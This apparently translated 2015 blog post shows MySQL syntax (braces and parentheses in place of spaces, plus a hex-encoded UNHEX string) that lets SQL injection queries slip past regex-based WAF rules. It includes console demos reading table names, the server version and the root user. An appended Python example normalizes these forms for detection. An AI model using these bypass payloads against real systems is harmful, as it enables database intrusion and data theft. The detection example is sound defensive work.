MySQL syntax that bypasses some WAFs
2015-02-12 08:25
select{x table_name}from{x information_schema.tables}
    mysql> select{x table_name}from{x information_schema.tables};
    +----------------------------------------------------+
    | table_name                                         |
    +----------------------------------------------------+
    | CHARACTER_SETS                                     |
    | COLLATIONS                                         |
    | COLLATION_CHARACTER_SET_APPLICABILITY              |
    | COLUMNS                                            |
    | COLUMN_PRIVILEGES                                  |
    | ENGINES                                            |

    mysql> select{x version()}from{x user};
    +---------------+
    | {x version()} |
    +---------------+
    | 5.5.20-log    |
    | 5.5.20-log    |
    | 5.5.20-log    |
    | 5.5.20-log    |
    +---------------+
    4 rows in set (0.00 sec)
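In select{x a}from{x b}, b is the name of any table that exists in the current database, and a is the content you want returned. Hmm, the scenario I can think of is fetching things like user() and version(), with {} standing in for spaces to get past regex-based detection and the like. In that case we can also just use select{x (user())} or select(user()).
To retrieve other information, do it like this.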
    mysql> select{x (select user from user limit 1)} from{x user};
    +-------------------------------------+
    | {x (select user from user limit 1)} |
    +-------------------------------------+
    | root                                |
    | root                                |
    | root                                |
    | root

    mysql> select{x(name)}from{x(manager)};
    +--------+
    | name   |
    +--------+
    | admin  |
    +--------+
    1 row in set (0.00 sec)
You can play it this way too, dropping the spaces.
Wouldn't it be enough to just use parentheses!
such as: select(host)from(mysql.user); SELECT(UNHEX(UNHEX(333532453335324533323335)));
Some WAF rules are able to match the plain-parentheses form.
select{x+table_name}from{x(information_schema.tables)}
https://twitter.com/Black2Fan/status/564746640138182656
http://dev.mysql.com/doc/refman/5.6/en/date-and-time-literals.html#date-and-time-standard-sql-literals
http://dev.mysql.com/doc/refman/5.6/en/join.html#idm140714470997024
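Seen from the defender's side, the forms above only get past a rule that insists on whitespace between keywords. The following added example (not part of the original post; NAIVE_RULE and the function names are hypothetical) rewrites the brace and parenthesis separators as spaces before matching, and runs against the queries quoted above.

```python
import re

# Whitespace-dependent rule of the kind the post says can be evaded (hypothetical rule).
NAIVE_RULE = re.compile(r"\bselect\s+.+?\s+from\s+\S+", re.I | re.S)

# Opening of the brace form used on the page: "{" + identifier, e.g. "{x".
BRACE_OPEN = re.compile(r"\{\s*[A-Za-z_]\w*")
PARENS = re.compile(r"([()])")


def normalize(value: str) -> str:
    """Rewrite brace and parenthesis separators as plain spaces."""
    s = BRACE_OPEN.sub(" ", value)      # "{x table_name" -> "  table_name"
    s = s.replace("}", " ")             # closing brace acts as a separator
    s = PARENS.sub(r" \1 ", s)          # "select(host)from" -> "select ( host ) from"
    return re.sub(r"\s+", " ", s).strip()


def naive_match(value: str) -> bool:
    """Apply the rule to the raw value, as a whitespace-based filter would."""
    return bool(NAIVE_RULE.search(value))


def hardened_match(value: str) -> bool:
    """Apply the same rule to the normalized value."""
    return naive_match(normalize(value))


# Query strings quoted in the post, plus one constructed benign value.
SAMPLES = [
    "select{x table_name}from{x information_schema.tables}",
    "select{x version()}from{x user}",
    "select{x(name)}from{x(manager)}",
    "select(host)from(mysql.user)",
    "select{x+table_name}from{x(information_schema.tables)}",
    "name=alice&page=2",  # constructed benign input
]


def report(samples=SAMPLES):
    """Return (value, naive verdict, hardened verdict) for each sample."""
    return [(s, naive_match(s), hardened_match(s)) for s in samples]


if __name__ == "__main__":
    for value, naive, hardened in report():
        print(f"naive={naive!s:5} hardened={hardened!s:5} {value}")
```

The normalizer is a regex heuristic, not a SQL lexer: it covers only the separator forms shown in this post, and a select without a from clause, such as the UNHEX line above, is outside this rule.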